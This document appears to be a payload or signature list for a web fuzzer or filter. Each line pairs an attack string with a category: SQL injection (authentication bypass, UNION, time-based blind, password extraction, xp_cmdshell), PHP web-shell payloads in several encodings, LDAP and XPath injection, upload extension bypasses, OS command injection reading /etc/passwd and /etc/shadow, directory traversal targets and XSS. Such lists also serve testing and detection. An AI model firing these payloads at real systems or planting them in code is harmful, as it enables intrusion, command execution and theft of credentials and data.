@variable : SQL Injection Attacks
,@variable : SQL Injection Attacks
PRINT : SQL Injection Attacks
PRINT @@variable : SQL Injection Attack
from : SQL Injection Attack
insert : SQL Injection Attack
procedure : SQL Injection Attack
limit : SQL Injection Attack
order by : SQL Injection Attack
asc : SQL Injection Attack
desc : SQL Injection Attack
delete : SQL Injection Attack
update : SQL Injection Attack
distinct : SQL Injection Attack
having : SQL Injection Attack
truncate : SQL Injection Attack
handler : SQL Injection Attack
bfilename : SQL Injection Attack
union : SQL Injection Attack
'%20-- : SQL Injection Attack
--'; : SQL Injection Attack
'%20; : SQL Injection Attack
=%20' : SQL Injection Attack
=%20; : SQL Injection Attack
=%20-- : SQL Injection Attack
'or%20select * : SQL Injection Attack
admin'-- : SQL Injection Attack
<>"'%;)(&+ : SQL Injection Attack
'%20or%20''=' : SQL Injection Attack
'%20or%20'x'='x : SQL Injection Attack
"%20or%20"x"="x : SQL Injection Attack
')%20or%20('x'='x : SQL Injection Attack
0 or 1=1 : SQL Injection Attack
' or 0=0 -- : SQL Injection Attack
" or 0=0 -- : SQL Injection Attack
or 0=0 -- : SQL Injection Attack
' or 0=0 # : SQL Injection Attack
" or 0=0 # : SQL Injection Attack
or 0=0 # : SQL Injection Attack
' or 1=1-- : SQL Injection Attack
" or 1=1-- : SQL Injection Attack
' or '1'='1'-- : SQL Injection Attack
"' or 1 --'" : SQL Injection Attack
or 1=1-- : SQL Injection Attack
or%201=1 : SQL Injection Attack
or%201=1 -- : SQL Injection Attack
' or 1=1 or ''=' : SQL Injection Attack
" or 1=1 or ""=" : SQL Injection Attack
' or a=a-- : SQL Injection Attack
" or "a"="a : SQL Injection Attack
') or ('a'='a : SQL Injection Attack
") or ("a"="a : SQL Injection Attack
hi" or "a"="a : SQL Injection Attack
hi" or 1=1 -- : SQL Injection Attack
hi' or 1=1 -- : SQL Injection Attack
hi' or 'a'='a : SQL Injection Attack
hi') or ('a'='a : SQL Injection Attack
hi") or ("a"="a : SQL Injection Attack
'hi' or 'x'='x'; : SQL Injection Attack
' or username like '% : SQL Injection Attack
' or uname like '% : SQL Injection Attack
' or userid like '% : SQL Injection Attack
' or uid like '% : SQL Injection Attack
' or user like '% : SQL Injection Attack
exec xp : SQL Injection Attack
exec sp : SQL Injection Attack
'; exec master..xp_cmdshell : SQL Injection Attack
'; exec xp_regread : SQL Injection Attack
t'exec master..xp_cmdshell 'nslookup www.google.com'-- : SQL Injection Attack
--sp_password : SQL Injection Attack
' UNION SELECT : SQL Injection Attack
' UNION ALL SELECT : SQL Injection Attack
' or (EXISTS) : SQL Injection Attack
' (select top 1 : SQL Injection Attack
'||UTL_HTTP.REQUEST : SQL Injection Attack
1;SELECT%20\* : SQL Injection Attack
to_timestamp_tz : SQL Injection Attack
tz_offset : SQL Injection Attack
&lt;&gt;&quot;'%;)(&amp;+ : SQL Injection Attack
'%20or%201=1 : SQL Injection Attack
%27%20or%201=1 : SQL Injection Attack
%20$(sleep%2050) : SQL Injection Attack
%20'sleep%2050' : SQL Injection Attack
char%4039%41%2b%40SELECT : SQL Injection Attack
&apos;%20OR : SQL Injection Attack
'sqlattempt1 : SQL Injection Attack
(sqlattempt2) : SQL Injection Attack
*(|(mail=*)) : SQL Injection Attack
%2A%28%7C%28mail%3D%2A%29%29 : SQL Injection Attack
*(|(objectclass=*)) : SQL Injection Attack
%2A%28%7C%28objectclass%3D%2A%29%29 : SQL Injection Attack
' or 1=1 or ''=' : SQL Injection Attack
' or ''=' : SQL Injection Attack
x' or 1=1 or 'x'='y : SQL Injection Attack
 union select  : SQL Injection Attack
+union+select+ : SQL Injection Attack
/**/union/**/select/**/ : SQL Injection Attack
/**/UNunionION/**/SELselectECT/**/ : SQL Injection Attack
/**//*UnIOn*//**//*SEleCt*//**/ : SQL Injection Attack
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ : SQL Injection Attack
 union all select  : SQL Injection Attack
+union+all+select+ : SQL Injection Attack
/**/union/**/all/**/select/**/ : SQL Injection Attack
/**/UNunionION/**/all/**/SELselectECT/**/ : SQL Injection Attack
/**//*UnIOn*//**/all/**//*SEleCt*//**/ : SQL Injection Attack
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ : SQL Injection Attack
 waitfor delay '0:0:10'-- : SQL Injection Attack
+waitfor+delay+'0:0:10'-- : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'-- : SQL Injection Attack
%20waitfor%20delay%20'0:0:20'-- : SQL Injection Attack
 waitfor delay '0:0:10'/* : SQL Injection Attack
+waitfor+delay+'0:0:10'/* : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'/* : SQL Injection Attack
%20waitfor%20delay%20'0:0:20'/* : SQL Injection Attack
'  waitfor delay '0:0:10'--+ : SQL Injection Attack
'+waitfor+delay+'0:0:10'--+ : SQL Injection Attack
'/**/ waitfor/**/delay/**/'0:0:10'--+ : SQL Injection Attack
'%20waitfor%20delay%20'0:0:20'--+ : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))-- : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+-- : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**/-- : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20-- : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+/* : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**//* : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20/* : SQL Injection Attack
' and 0=benchmark(3000000,MD5(1))--+ : SQL Injection Attack
'+and+0=benchmark(3000000,MD5(1))+--+ : SQL Injection Attack
'/**/and/**/0=benchmark(3000000,MD5(1))/**/--+ : SQL Injection Attack
'%20and%200=benchmark(3000000,MD5(1))%20--+ : SQL Injection Attack
sleep(__TIME__)# : SQL Injection Attack
1 or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)# : SQL Injection Attack
' or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)=" : SQL Injection Attack
' or sleep(__TIME__)=' : SQL Injection Attack
1) or sleep(__TIME__)# : SQL Injection Attack
") or sleep(__TIME__)=" : SQL Injection Attack
') or sleep(__TIME__)=' : SQL Injection Attack
1)) or sleep(__TIME__)# : SQL Injection Attack
")) or sleep(__TIME__)=" : SQL Injection Attack
')) or sleep(__TIME__)=' : SQL Injection Attack
pg_sleep(__TIME__)-- : SQL Injection Attack
1 or pg_sleep(__TIME__)-- : SQL Injection Attack
" or pg_sleep(__TIME__)-- : SQL Injection Attack
' or pg_sleep(__TIME__)-- : SQL Injection Attack
1) or pg_sleep(__TIME__)-- : SQL Injection Attack
") or pg_sleep(__TIME__)-- : SQL Injection Attack
') or pg_sleep(__TIME__)-- : SQL Injection Attack
1)) or pg_sleep(__TIME__)-- : SQL Injection Attack
")) or pg_sleep(__TIME__)-- : SQL Injection Attack
')) or pg_sleep(__TIME__)-- : SQL Injection Attack
<?system('id');?> : SQL Injection Attack
<?system('uname -a');?> : SQL Injection Attack
<?php phpinfo(); ?> : SQL Injection Attack
<? system($_GET['c']); ?> : SQL Injection Attack
0x3c3f2073797374656d28245f4745545b2763275d293b203f3e : SQL Injection Attack
PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg== : SQL Injection Attack
%3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E : SQL Injection Attack
char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,39,93,41,59,32,63,62) : SQL Injection Attack
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami : SQL Injection Attack
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami : SQL injection attack
data:;base64,<? exec($_GET[cmd]); ? >&cmd=whoami : SQL Injection Attack
 and 1=1-- : SQL Injection Attack
 and 1=2-- : SQL Injection Attack
 and 5050=5050-- : SQL Injection Attack
 and 5050=5051-- : SQL Injection Attack
 and substring(@@version,1,1)=4-- : SQL Injection Attack
 and substring(@@version,1,1)=5-- : SQL Injection Attack
 and ORD(MID((VERSION()), N, 1)) Insert<>=Comparer<InsertCharValueHere>-- : SQL Injection Attack
 and (SELECT 1 from admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from tblAdmin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from Administrator limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from tbl_admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from user limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from users limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from TableName limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,password),1,1) from user limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,email),1,1) from users limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1-- : SQL Injection Attack
 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65-- : SQL Injection Attack
 and 1=1 : SQL Injection Attacks
 and 1=2 : SQL Injection Attacks
 and 1>2 : SQL Injection Attacks
 and 1<=2 : SQL Injection Attacks
+and+1=1 : SQL Injection Attacks
+and+1=2 : SQL Injection Attacks
+and+1>2 : SQL Injection Attacks
+and+1<=2 : SQL Injection Attacks
/**/and/**/1=1 : SQL Injection Attacks
/**/and/**/1=2 : SQL Injection Attacks
/**/and/**/1>2 : SQL Injection Attacks
/**/and/**/1<=2 : SQL Injection Attacks
/**/or/**/1/**/=/**/1 : SQL Injection Attacks
/**/or/**/1/**/=/**/2 : SQL Injection Attacks
/**/or/**/1/**/>/**/2 : SQL Injection Attacks
/**/or/**/1/**/<=/**/2 : SQL Injection Attacks
 and 50=50 : SQL Injection Attacks
 and 50=52 : SQL Injection Attacks
 and 50>52 : SQL Injection Attacks
 and 50<=52 : SQL Injection Attacks
+and+50=50 : SQL Injection Attacks
+and+50=52 : SQL Injection Attacks
+and+50>52 : SQL Injection Attacks
+and+50<=52 : SQL Injection Attacks
/**/and/**/50=50 : SQL Injection Attacks
/**/and/**/50=52 : SQL Injection Attacks
/**/and/**/50>52 : SQL Injection Attacks
/**/and/**/50<=52 : SQL Injection Attacks
/**/or/**/51/**/=/**/51 : SQL Injection Attacks
/**/or/**/51/**/=/**/52 : SQL Injection Attacks
/**/or/**/51/**/>/**/52 : SQL Injection Attacks
/**/or/**/51/**/<=/**/52 : SQL Injection Attacks
 waitfor delay '0:0:10'-- : SQL Injection Attacks
; waitfor delay '0:0:10'-- : SQL Injection Attacks
+waitfor+delay+'0:0:10'-- : SQL Injection Attacks
/**/waitfor/**/delay/**/'0:0:10'- : SQL Injection Attacks-
%20waitfor%20delay%20'0:0:20'-- : SQL Injection Attacks
 waitfor delay '0:0:10'-- : SQL Injection Attacks
; waitfor delay '0:0:10'-- : SQL Injection Attacks
+waitfor+delay+'0:0:10'/* : SQL Injection Attacks
/**/waitfor/**/delay/**/'0:0:10'/\ : SQL Injection Attacks*
%20waitfor%20delay%20'0:0:20'/* : SQL Injection Attacks
'  waitfor delay '0:0:10'--+ : SQL Injection Attacks
'+waitfor+delay+'0:0:10'--+ : SQL Injection Attacks
'/**/ waitfor/**/delay/**/'0:0:10'--+ : SQL Injection Attacks
'%20waitfor%20delay%20'0:0:20'--+ : SQL Injection Attacks
 and 0=benchmark(3000000,MD5(1))-- : SQL Injection Attacks
+and+0=benchmark(3000000,MD5(1))+-- : SQL Injection Attacks
/**/and/**/0=benchmark(3000000,MD5(1))/**/-- : SQL Injection Attacks
%20and%200=benchmark(3000000,MD5(1))%20-- : SQL Injection Attacks
; and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attacks
 and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attacks
+and+0=benchmark(3000000,MD5(1))+/* : SQL Injection Attacks
/**/and/**/0=benchmark(3000000,MD5(1))/**//* : SQL Injection Attacks
%20and%200=benchmark(3000000,MD5(1))%20/* : SQL Injection Attacks
' and 0=benchmark(3000000,MD5(1))--+ : SQL Injection Attacks
'+and+0=benchmark(3000000,MD5(1))+--+ : SQL Injection Attacks
'/**/and/**/0=benchmark(3000000,MD5(1))/**/--+ : SQL Injection Attacks
'%20and%200=benchmark(3000000,MD5(1))%20--+ : SQL Injection Attacks
sleep(__TIME__)# : SQL Injection Attacks
1 or sleep(__TIME__)# : SQL Injection Attacks
" or sleep(__TIME__)# : SQL Injection Attacks
' or sleep(__TIME__)# : SQL Injection Attacks
" or sleep(__TIME__)=" : SQL Injection Attacks
' or sleep(__TIME__)=' : SQL Injection Attacks
1) or sleep(__TIME__)# : SQL Injection Attacks
") or sleep(__TIME__)=" : SQL Injection Attacks
') or sleep(__TIME__)=' : SQL Injection Attacks
1)) or sleep(__TIME__)# : SQL Injection Attacks
")) or sleep(__TIME__)=" : SQL Injection Attacks
')) or sleep(__TIME__)=' : SQL Injection Attacks
pg_sleep(__TIME__)-- : SQL Injection Attacks
1 or pg_sleep(__TIME__)-- : SQL Injection Attacks
" or pg_sleep(__TIME__)-- : SQL Injection Attacks
' or pg_sleep(__TIME__)-- : SQL Injection Attacks
1) or pg_sleep(__TIME__)-- : SQL Injection Attacks
") or pg_sleep(__TIME__)-- : SQL Injection Attacks
') or pg_sleep(__TIME__)-- : SQL Injection Attacks
1)) or pg_sleep(__TIME__)-- : SQL Injection Attacks
")) or pg_sleep(__TIME__)-- : SQL Injection Attacks
')) or pg_sleep(__TIME__)-- : SQL Injection Attacks
%2A%28%7C%28mail%3D%2A%29%29 : LDAP Injection Attacks
%2A%28%7C%28objectclass%3D%2A%29%29 : LDAP Injection Attacks
%2A%7C : LDAP Injection Attacks
*(|(mail=*)) : LDAP Injection Attacks
*(|(objectclass=*)) : LDAP Injection Attacks
x' or name()='username' or 'x'='y : LDAP Injection Attacks
*()|&' : LDAP Injection Attacks
admin\* : LDAP Injection Attacks
admin*)((|userpassword=*) : LDAP Injection Attacks
*)(uid=*))(|(uid=* : LDAP Injection Attacks
*()|%26' : LDAP Injection Attacks
phtml : Malicious file upload attacks
php3 : Malicious file upload attacks
php4 : Malicious file upload attacks
php5 : Malicious file upload attacks
pHtml : Malicious file upload attacks
pHp3 : Malicious file upload attacks
pHp4 : Malicious file upload attacks
pHp5 : Malicious file upload attacks
asa : Malicious file upload attacks
iNc%00 : Malicious file upload attacks
iNc%20%20%20 : Malicious file upload attacks
iNc%20%20%20...%20.%20.. : Malicious file upload attacks
iNc...... : Malicious file upload attacks
inc%00 : Malicious file upload attacks
inc%20%20%20 : Malicious file upload attacks
inc%20%20%20...%20.%20.. : Malicious file upload attacks
inc...... : Malicious file upload attacks
pHp%00 : Malicious file upload attacks
pHp%20%20%20 : Malicious file upload attacks
pHp%20%20%20...%20.%20.. : Malicious file upload attacks
pHp...... : Malicious file upload attacks
pHp3%00 : Malicious file upload attacks
pHp3%20%20%20 : Malicious file upload attacks
pHp3%20%20%20...%20.%20.. : Malicious file upload attacks
pHp3...... : Malicious file upload attacks
pHp4%00 : Malicious file upload attacks
pHp4%20%20%20 : Malicious file upload attacks
pHp4%20%20%20...%20.%20.. : Malicious file upload attacks
pHp4...... : Malicious file upload attacks
pHp5%00 : Malicious file upload attacks
pHp5%20%20%20 : Malicious file upload attacks
pHp5%20%20%20...%20.%20.. : Malicious file upload attacks
pHp5...... : Malicious file upload attacks
pHtml%00 : Malicious file upload attacks
pHtml%20%20%20 : Malicious file upload attacks
pHtml%20%20%20...%20.%20.. : Malicious file upload attacks
pHtml...... : Malicious file upload attacks
php%00 : Malicious file upload attacks
php%20%20%20 : Malicious file upload attacks
php%20%20%20...%20.%20.. : Malicious file upload attacks
php...... : Malicious file upload attacks
php3%00 : Malicious file upload attacks
php3%20%20%20 : Malicious file upload attacks
php3%20%20%20...%20.%20.. : Malicious file upload attacks
php3...... : Malicious file upload attacks
php4%00 : Malicious file upload attacks
php4%20%20%20 : Malicious file upload attacks
php4%20%20%20...%20.%20.. : Malicious file upload attacks
php4...... : Malicious file upload attacks
php5%00 : Malicious file upload attacks
php5%20%20%20 : Malicious file upload attacks
php5%20%20%20...%20.%20.. : Malicious file upload attacks
php5...... : Malicious file upload attacks
phtml%00 : Malicious file upload attacks
phtml%20%20%20 : Malicious file upload attacks
phtml%20%20%20...%20.%20.. : Malicious file upload attacks
phtml...... : Malicious file upload attacks
asp%20%20%20 : Malicious file upload attacks
aspx%20%20%20 : Malicious file upload attacks
asa%20%20%20 : Malicious file upload attacks
aSP%20%20%20 : Malicious file upload attacks
aSpx%20%20%20 : Malicious file upload attacks
aSa%20%20%20 : Malicious file upload attacks
asp...... : Malicious file upload attacks
aspx...... : Malicious file upload attacks
asa...... : Malicious file upload attacks
aSP...... : Malicious file upload attacks
aSpx...... : Malicious file upload attacks
aSa...... : Malicious file upload attacks
asp%20%20%20...%20.%20.. : Malicious file upload attacks
aspx%20%20%20...%20.%20.. : Malicious file upload attacks
asa%20%20%20...%20.%20.. : Malicious file upload attacks
aSP%20%20%20...%20.%20.. : Malicious file upload attacks
aSpx%20%20%20...%20.%20.. : Malicious file upload attacks
aSa%20%20%20...%20.%20.. : Malicious file upload attacks
asp%00 : Malicious file upload attacks
aspx%00 : Malicious file upload attacks
asa%00 : Malicious file upload attacks
aSp%00 : Malicious file upload attacks
aSpx%00 : Malicious file upload attacks
aSa%00 : Malicious file upload attacks
cfm : Malicious file upload attacks
cfml : Malicious file upload attacks
cfc : Malicious file upload attacks
dbm : Malicious file upload attacks
cFm : Malicious file upload attacks
cFml : Malicious file upload attacks
cFc : Malicious file upload attacks
dBm : Malicious file upload attacks
cfm%20%20%20 : Malicious file upload attacks
cfml%20%20%20 : Malicious file upload attacks
cfc%20%20%20 : Malicious file upload attacks
dbm%20%20%20 : Malicious file upload attacks
cFm%20%20%20 : Malicious file upload attacks
cFml%20%20%20 : Malicious file upload attacks
cFc%20%20%20 : Malicious file upload attacks
dBm%20%20%20 : Malicious file upload attacks
cfm...... : Malicious file upload attacks
cfml...... : Malicious file upload attacks
cfc....... : Malicious file upload attacks
dbm...... : Malicious file upload attacks
cFm...... : Malicious file upload attacks
cFml...... : Malicious file upload attacks
cFc...... : Malicious file upload attacks
dBm...... : Malicious file upload attacks
cfm%20%20%20...%20.%20.. : Malicious file upload attacks
cfml%20%20%20...%20.%20.. : Malicious file upload attacks
cfc%20%20%20...%20.%20.. : Malicious file upload attacks
dbm%20%20%20...%20.%20.. : Malicious file upload attacks
cFm%20%20%20...%20.%20.. : Malicious file upload attacks
cFml%20%20%20...%20.%20.. : Malicious file upload attacks
cFc%20%20%20...%20.%20.. : Malicious file upload attacks
dBm%20%20%20...%20.%20.. : Malicious file upload attacks
cfm%00 : Malicious file upload attacks
cfml%00 : Malicious file upload attacks
cfc%00 : Malicious file upload attacks
dbm%00 : Malicious file upload attacks
cFm%00 : Malicious file upload attacks
cFml%00 : Malicious file upload attacks
cFc%00 : Malicious file upload attacks
dBm%00 : Malicious file upload attacks
jspx : Malicious file upload attacks
jsw : Malicious file upload attacks
jsv : Malicious file upload attacks
jspf : Malicious file upload attacks
jSpx : Malicious file upload attacks
jSw : Malicious file upload attacks
jSv : Malicious file upload attacks
jSpf : Malicious file upload attacks
jSp%00 : Malicious file upload attacks
jSp%20%20%20 : Malicious file upload attacks
jSp%20%20%20...%20.%20..a : Malicious file upload attacks
jSp...... : Malicious file upload attacks
jSpf%00 : Malicious file upload attacks
jSpf%20%20%20 : Malicious file upload attacks
jSpf%20%20%20...%20.%20..a : Malicious file upload attacks
jSpf...... : Malicious file upload attacks
jSpx%00 : Malicious file upload attacks
jSpx%20%20%20 : Malicious file upload attacks
jSpx%20%20%20...%20.%20..a : Malicious file upload attacks
jSpx...... : Malicious file upload attacks
jSv%00 : Malicious file upload attacks
jSv%20%20%20 : Malicious file upload attacks
jSv%20%20%20...%20.%20..a : Malicious file upload attacks
jSv...... : Malicious file upload attacks
jSw%00 : Malicious file upload attacks
jSw%20%20%20 : Malicious file upload attacks
jSw%20%20%20...%20.%20..a : Malicious file upload attacks
jSw...... : Malicious file upload attacks
jsp%00 : Malicious file upload attacks
jsp%20%20%20 : Malicious file upload attacks
jsp%20%20%20...%20.%20..a : Malicious file upload attacks
jsp...... : Malicious file upload attacks
jspf%00 : Malicious file upload attacks
jspf%20%20%20 : Malicious file upload attacks
jspf%20%20%20...%20.%20..a : Malicious file upload attacks
jspf...... : Malicious file upload attacks
jspx%00 : Malicious file upload attacks
jspx%20%20%20 : Malicious file upload attacks
jspx%20%20%20...%20.%20..a : Malicious file upload attacks
jspx...... : Malicious file upload attacks
jsv%00 : Malicious file upload attacks
jsv%20%20%20 : Malicious file upload attacks
jsv%20%20%20...%20.%20..a : Malicious file upload attacks
jsv...... : Malicious file upload attacks
jsw%00 : Malicious file upload attacks
jsw%20%20%20 : Malicious file upload attacks
jsw%20%20%20...%20.%20..a : Malicious file upload attacks
jsw...... : Malicious file upload attacks
' or '1'='1 : Xpath injection attack
' or ''=' : Xpath injection attack
x' or 1=1 or 'x'='y : Xpath injection attack
count(/child::node()) : Xpath injection attack
x' or name()='username' or 'x'='y : Xpath injection attack
' and count(/*)=1 and '1'='1 : Xpath injection attack
' and count(/@*)=1 and '1'='1 : Xpath injection attack
' and count(/comment())=1 and '1'='1 : Xpath injection attack
uname -n -s : OS command injection attacks
whoami|pwd : OS command injection attacks
cat /etc/passwd : OS command injection attacks
ls -la /tmp : OS command injection attacks
ls -la /home : OS command injection attacks
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt; : OS command injection attacks
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt; : OS command injection attacks
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; : OS command injection attacks
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; : OS command injection attacks
/index.html|id| : OS command injection attacks
;id; : OS command injection attacks
;id : OS command injection attacks
;netstat -a; : OS command injection attacks
;id; : OS command injection attacks
|id : OS command injection attacks
|/usr/bin/id : OS command injection attacks
|id| : OS command injection attacks
|/usr/bin/id| : OS command injection attacks
||/usr/bin/id| : OS command injection attacks
|id; : OS command injection attacks
||/usr/bin/id; : OS command injection attacks
;id| : OS command injection attacks
;|/usr/bin/id| : OS command injection attacks
\n/bin/ls -al\n : OS command injection attacks
\n/usr/bin/id\n : OS command injection attacks
\nid\n : OS command injection attacks
\n/usr/bin/id; : OS command injection attacks
\nid; : OS command injection attacks
\n/usr/bin/id| : OS command injection attacks
\nid| : OS command injection attacks
;/usr/bin/id\n : OS command injection attacks
;id\n : OS command injection attacks
|usr/bin/id\n : OS command injection attacks
|nid\n : OS command injection attacks
`id` : OS command injection attacks
`/usr/bin/id` : OS command injection attacks
a);id : OS command injection attacks
a;id : OS command injection attacks
a);id; : OS command injection attacks
a;id; : OS command injection attacks
a);id| : OS command injection attacks
a;id| : OS command injection attacks
a)|id : OS command injection attacks
a|id : OS command injection attacks
a)|id; : OS command injection attacks
a|id : OS command injection attacks
|/bin/ls -al : OS command injection attacks
a);/usr/bin/id : OS command injection attacks
a;/usr/bin/id : OS command injection attacks
a);/usr/bin/id; : OS command injection attacks
a;/usr/bin/id; : OS command injection attacks
a);/usr/bin/id| : OS command injection attacks
a;/usr/bin/id| : OS command injection attacks
a)|/usr/bin/id : OS command injection attacks
a|/usr/bin/id : OS command injection attacks
a)|/usr/bin/id; : OS command injection attacks
a|/usr/bin/id : OS command injection attacks
;system('cat%20/etc/passwd') : OS command injection attacks
;system('id') : OS command injection attacks
;system('/usr/bin/id') : OS command injection attacks
%0Acat%20/etc/passwd : OS command injection attacks
%0A/usr/bin/id : OS command injection attacks
%0Aid : OS command injection attacks
%0A/usr/bin/id%0A : OS command injection attacks
%0Aid%0A : OS command injection attacks
& ping -i 30 127.0.0.1 : OS command injection attacks &
& ping -n 30 127.0.0.1 & : OS command injection attacks
%0a ping -i 30 127.0.0.1 %0a : OS command injection attacks
`ping 127.0.0.1` : OS command injection attacks
| id : OS command injection attacks
& id : OS command injection attacks
; id : OS command injection attacks
%0a id %0a : OS command injection attacks
`id` : OS command injection attacks
$;/usr/bin/id : OS command injection attacks
/etc/passwd : Directory traversal attacks
/etc/shadow : Directory traversal attacks
/apache/logs/error.log  : Directory traversal attacks
/apache/logs/access.log  : Directory traversal attacks
/apache/logs/error.log  : Directory traversal attacks
/apache/logs/access.log  : Directory traversal attacks
/apache/logs/error.log  : Directory traversal attacks
/apache/logs/access.log  : Directory traversal attacks
/etc/httpd/logs/acces_log  : Directory traversal attacks
/etc/httpd/logs/acces.log  : Directory traversal attacks
/etc/httpd/logs/error_log  : Directory traversal attacks
/etc/httpd/logs/error.log  : Directory traversal attacks
/var/www/logs/access_log  : Directory traversal attacks
/var/www/logs/access.log  : Directory traversal attacks
/usr/local/apache/logs/access_log  : Directory traversal attacks
/usr/local/apache/logs/access.log  : Directory traversal attacks
/var/log/apache/access_log  : Directory traversal attacks
/var/log/apache2/access_log  : Directory traversal attacks
/var/log/apache/access.log  : Directory traversal attacks
/var/log/apache2/access.log  : Directory traversal attacks
/var/log/access_log  : Directory traversal attacks
/var/log/access.log  : Directory traversal attacks
/var/www/logs/error_log  : Directory traversal attacks
/var/www/logs/error.log  : Directory traversal attacks
/usr/local/apache/logs/error_log  : Directory traversal attacks
/usr/local/apache/logs/error.log  : Directory traversal attacks
/var/log/apache/error_log  : Directory traversal attacks
/var/log/apache2/error_log  : Directory traversal attacks
/var/log/apache/error.log  : Directory traversal attacks
/var/log/apache2/error.log  : Directory traversal attacks
/var/log/error_log  : Directory traversal attacks
/var/log/error.log  : Directory traversal attacks
<script>alert('Zer0Lulz')</script> : XSS attacks
<ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
"><script>alert('XSS')</script> : XSS attacks
"><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=><><script>alert('XSS')</script> : XSS attacks
=><><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
="><script>alert('XSS')</script> : XSS attacks
="><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
='><script>alert('XSS')</script> : XSS attacks
='><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
="><<script>alert('XSS')</script> : XSS attacks
="><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
='><<script>alert('XSS')</script> : XSS attacks
='><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
"><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
"><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=><><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
="><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
="><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
='><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
='><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
="><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
="><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
='><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
='><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
"%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS attacks
"%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
=%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e : XSS attacks
=%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS attacks
="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS attacks
='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS attacks
="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS attacks
='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS attacks
\\><script>alert('XSS')</script> : XSS attacks
\\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=><><script>alert('XSS')</script> : XSS attacks
=><><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=\\><script>alert('XSS')</script> : XSS attacks
=\\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=\><script>alert('XSS')</script> : XSS attacks
=\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=\\><<script>alert('XSS')</script> : XSS attacks
